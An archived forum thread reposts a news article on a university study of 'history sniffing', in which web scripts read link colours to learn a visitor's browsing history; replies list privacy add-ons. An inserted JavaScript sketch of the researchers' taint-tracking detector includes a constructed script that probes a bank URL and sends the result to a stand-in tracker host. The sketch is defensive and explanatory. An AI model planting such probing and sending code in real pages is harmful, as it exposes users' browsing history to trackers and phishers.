
History Sniffing - What Is It?



On the heels of a government report pushing a "do not track" option for Web browsers, a recent study from the University of California-San Diego finds that browser vulnerabilities can allow access to your Web-surfing history.


Researchers cautioned, however, that the practice is not as harmful as malicious software attacks like malware.


JavaScript code used by Web sites and advertisers exploits browser vulnerabilities to track which sites a user has or has not visited, the report said. Researchers have dubbed the practice "history sniffing," and they claim their work is the first empirical analysis of history sniffing across the Web.


"Nobody knew if anyone on the Internet was using history sniffing to get at users' private browsing history. What we were able to show is that the answer is yes," UC San Diego computer science professor Hovav Shacham said in a statement.


History sniffing is possible because browsers display links to sites you've visited differently from those you have not. If you've clicked on a link, it shows up purple. If you have not clicked, it displays as blue.


"History sniffing JavaScript code running on a Web page checks to see if your browser displays links to specific URLs as blue or purple," the report said.


Why is this important? Researchers said that Web site owners can use this information to see if you have been visiting the Web sites of their competitors. Advertising companies can also use the data to build user profiles, while criminals could watch which banking sites you use to know which fake banking site they should use for a phishing attack.


"JavaScript is a great thing, it allows things like Gmail and Google Maps and a whole bunch of Web 2.0 applications; but it also opens up a lot of security vulnerabilities. We want to let the broad public know that history sniffing is possible, it actually happens out there, and that there are a lot of people vulnerable to this attack," said Sorin Lerner, a computer science professor with the university's Jacobs School of Engineering.


The report found that the latest versions of Firefox, Chrome, and Safari block history-sniffing attacks. Internet Explorer, however, does not currently defend against history sniffing. November data from Net Applications found that IE still holds 58.26 percent of the global browser market share.


A Microsoft spokeswoman said the company takes "a holistic approach to protecting consumer privacy." That includes browser options like InPrivate Browsing, which lets customers surf without having their activity tracked.


"Internet Explorer 8's InPrivate Browsing feature puts people in control of their privacy, giving them the important features and controls to understand what information is being shared when they browse the Web," Microsoft said.


To gather their data, researchers used their JavaScript monitoring tool to look at the top 50,000 Web sites, as ranked by Alexa. The practice is not particularly widespread, at least. Of the 50,000 sites, they found that 485 of those sites can monitor a browser's history. Of those 485 sites, 63 of them transferred the browser history to the network; researchers only considered it history sniffing if that data was sent to the network. The topics of these 63 sites were varied, though most focused on entertainment. A complete list is included in the report.


To gather their data, researchers tagged – or "painted" – a link that was being tracked, akin to the paint packets banks add to bags of stolen money.


"As soon as a JavaScript tries to look at the color of a link, we immediately put 'paint' on that. Some sites collected that information but never sent it over the network, so there was all this 'paint' inside the browser. But in other cases, we observed 'paint' being sent over the network, indicating that history sniffing is going on," Lerner said.


Going forward, the researchers said they would use this technique to see if history sniffing is also used by Web 2.0 applications and social-network sites.


Shacham said that while history sniffing might be invasive, it is not as great a risk to your privacy as malicious software programs like malware, which can steal banking information or an entire Facebook profile. Still, "history sniffing is unusual in effectively allowing any site you visit to learn about your browsing habits on any other site, regardless if the two sites have any business relationship," he said.


He advised users to keep their browsers and Flash plug-ins up-to-date to avoid history sniffing.


The report comes several days after the Federal Trade Commission released an online privacy report that recommended "do not track" technology for browsers. Essentially, browser companies should add the ability for consumers to opt-out of having their Web activity tracked, the agency said. The FTC discussed it more at a House hearing last week, where a researcher from Symantec expressed his concern about "do not track" technology. Major browser firms like Microsoft, Google, and Mozilla have said they will review the FTC's proposal.

Original post: pcmag.com




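The "paint" detection described in the article above can be modelled as taint tracking: a value read from a link's colour is marked, the mark follows anything derived from it, and a marked value reaching the network is the signal. The sketch below is an added example, not part of the original post and not the researchers' tool; the simulated page environment (`linkColor`, `derive`, `send`), the `monitor` function and the sample URLs are all hypothetical.

```javascript
// Added example: toy model of "paint" (taint) tracking. All names are hypothetical.
const VISITED = new Set(["https://bank.example/"]); // constructed sample history

class Painted {                       // a value carrying paint plus its origin
  constructor(value, sources) { this.value = value; this.sources = sources; }
}
const unwrap = (v) => (v instanceof Painted ? v.value : v);
const paintOf = (v) => (v instanceof Painted ? v.sources : []);

// Any value derived from painted inputs stays painted (propagation).
function derive(fn, ...args) {
  const sources = [...new Set(args.flatMap(paintOf))];
  const out = fn(...args.map(unwrap));
  return sources.length ? new Painted(out, sources) : out;
}

function monitor(script) {
  const report = { colorReads: [], leaks: [] };
  const env = {
    // Source: reading a link's colour paints the result with the probed URL.
    linkColor(url) {
      report.colorReads.push(url);
      return new Painted(VISITED.has(url) ? "purple" : "blue", [url]);
    },
    derive,
    // Sink: a network send. Paint arriving here is the leak signal.
    send(dest, payload) {
      if (paintOf(payload).length) report.leaks.push({ dest, sources: paintOf(payload) });
    },
  };
  script(env);
  report.verdict = report.leaks.length ? "history sniffing"
    : report.colorReads.length ? "inspects link colour only" : "clean";
  return report;
}

// Constructed page scripts: one keeps the result local, one sends it out.
const localOnly = (env) => { env.derive((c) => c === "purple", env.linkColor("https://bank.example/")); };
const exfil = (env) => {
  const hit = env.derive((c) => c === "purple", env.linkColor("https://bank.example/"));
  env.send("https://tracker.example/log", env.derive((h) => "seen=" + h, hit));
};

console.log(monitor(localOnly).verdict, "|", monitor(exfil).verdict);
```

The two verdicts mirror the article's split between sites that only inspect link colour and sites that send the result over the network. This model follows explicit data flow only; a script that branches on the colour and sends an unpainted constant would not be flagged by it.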

  • 3 weeks later...

With Firefox's NoScript add-on startpanic.com could NOT read my browser history. Here are some other security add-ons with a brief description I use with Firefox. BetterPrivacy - super cookie (LSO) safeguard, BrowserProtect - browser hijack protection, CookieCuller - extended cookie management, CounterPixel - displays the name of a web site counting pixel service(s), KeyScrambler - key-logger protection, Search Engine Security - protects against Blackhat spam search engine optimization (SEO).


Hey guys:

Thanks for the great links!

It's quite an issue (with many gray areas/edges.)

Following are a few more links...


The article which I found most eye opening is this one, which points out that some on-line shopping sites will actually offer different prices to various people based on their browser history...and it's getting more prevalent. Am I Seeing... and this one My link


Bloomberg has a take that targeted advertising isn't all bad (better than 'dumb ads') Bloomberg BusinessWeek


N Y Times has good, concise links to using the tools in your browser N Y Times tech


PrivacyChoice has several different tools (some aggressive) and a Tracking Company link to list the company's info whose cookies show up (a lot of detail.)


TACO/Abine offer a multi-setting blocker for Firefox (I.E. coming) for about $3/month.


AND, what probably promises to become the industry standard in voluntary opt-out is DoNotTrack, a program from Stanford which sends a message to every site that requests info saying PLEASE Do Not Track. (also only available for Firefox now..others coming) also has some other links.


...hope you find these helpful, or at least interesting....sorry so long a post



This topic is now archived and is closed to further replies.
